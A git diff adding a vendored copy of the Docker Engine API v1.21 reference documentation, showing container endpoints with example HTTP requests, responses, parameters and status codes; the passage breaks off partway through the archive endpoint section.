0000000000..b4f54b7c44 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.21.md @@ -0,0 +1,2969 @@ +--- +title: "Engine API v1.21" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.21/ +- /reference/api/docker_remote_api_v1.21/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.21/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.21/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "MemorySwappiness": 60, + "OomKillDisable": false, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container users to mount volumes. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "" + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ] + } + +**Example request, with size information**: + + GET /v1.21/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.21/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.21/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.21/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.21/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.21/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.21/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.21/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.21/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.21/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.21/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" 